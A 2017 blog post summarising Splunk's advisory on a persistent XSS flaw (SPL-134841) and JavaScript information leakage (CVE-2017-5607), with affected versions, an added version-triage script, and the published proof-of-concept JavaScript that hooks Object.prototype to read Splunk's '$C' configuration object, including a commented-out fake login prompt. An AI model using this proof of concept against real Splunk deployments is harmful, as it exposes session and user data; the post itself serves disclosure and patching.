Monday, April 3, 2017

Splunk Addressed Multiple Vulnerabilities Last Week


Splunk is a big data platform that is also used in many SOCs as a SIEM tool for log analysis. Splunk is the leader in Operational Intelligence platforms. Splunk customers use it to monitor, search, analyze and visualize machine data. The volume of data collected in Splunk is very high.



Splunk Enterprise 6.5.3, 6.2.13.1 and Splunk Light 6.5.2 address multiple vulnerabilities:

  • Persistent Cross Site Scripting in Splunk Web (SPL-134841)
  • Information Leakage via JavaScript (CVE-2017-5607)

 

Refer to this link for details and mitigation for both vulnerabilities: https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607

 

Affected Products and Components

 

Persistent Cross Site Scripting in Splunk Web (SPL-134841)

Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.5.2

Affected Components: All Splunk Enterprise components running Splunk Web.

 

Information Leakage via JavaScript (CVE-2017-5607)

Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2

Affected Components: All Splunk Enterprise components.
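
The version ranges above, turned into a triage check for an inventory of Splunk builds (an added example, not code from the advisory or from Splunk). The product labels 'enterprise' and 'light' and the sample hosts are assumptions of the example. By the listed ranges, 6.2.13.1 is past the CVE-2017-5607 fix but still before 6.2.14 for SPL-134841.

```python
# Added example: fixed-version thresholds transcribed from the ranges above.
ENTERPRISE_FIXED = {
    "SPL-134841": {(6, 5): (6, 5, 3), (6, 4): (6, 4, 6),
                   (6, 3): (6, 3, 10), (6, 2): (6, 2, 14)},
    "CVE-2017-5607": {(6, 5): (6, 5, 3), (6, 4): (6, 4, 6),
                      (6, 3): (6, 3, 10), (6, 2): (6, 2, 13, 1),
                      (6, 1): (6, 1, 13), (6, 0): (6, 0, 14),
                      (5, 0): (5, 0, 18)},
}
LIGHT_FIXED = (6, 5, 2)  # Splunk Light: both issues listed as "before 6.5.2"


def parse(version):
    """'6.2.13.1' -> (6, 2, 13, 1)"""
    return tuple(int(part) for part in version.strip().split("."))


def is_before(version, fixed):
    """Compare after zero-padding so 6.5.3 and 6.5.3.0 are equal."""
    width = max(len(version), len(fixed))
    pad = lambda t: t + (0,) * (width - len(t))
    return pad(version) < pad(fixed)


def affected_by(product, version):
    """Return the advisories whose listed range contains this build.

    product is 'enterprise' or 'light' (hypothetical labels for this example).
    A release branch the advisory does not list is not reported at all.
    """
    v = parse(version)
    hits = []
    for advisory, branches in ENTERPRISE_FIXED.items():
        fixed = LIGHT_FIXED if product == "light" else branches.get(v[:2])
        if fixed is not None and is_before(v, fixed):
            hits.append(advisory)
    return hits


if __name__ == "__main__":
    # Constructed inventory: host names and versions are sample values.
    inventory = [("sh01", "enterprise", "6.5.2"), ("idx07", "enterprise", "6.2.13.1"),
                 ("hf02", "enterprise", "6.1.12"), ("lab", "light", "6.5.2")]
    for host, product, version in inventory:
        print(host, product, version, affected_by(product, version) or "not in a listed range")
```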

 

 

Below is the proof-of-concept JavaScript code published in the advisory:

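<script>
// Setter on Object.prototype runs when "$C" is assigned; val is the assigned object
Object.defineProperty(Object.prototype, "$C", { set: function (val) {
    //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: " + val.USERNAME, "Password")
    for (var i in val) {
      // Show each property name and value of the assigned object
      alert("" + i + " " + val[i]);
    }
  }
});
</script>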

 



For more details regarding information leakage via JavaScript: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt

This post contains the exploit/POC and how to reproduce it: http://seclists.org/fulldisclosure/2017/Mar/89


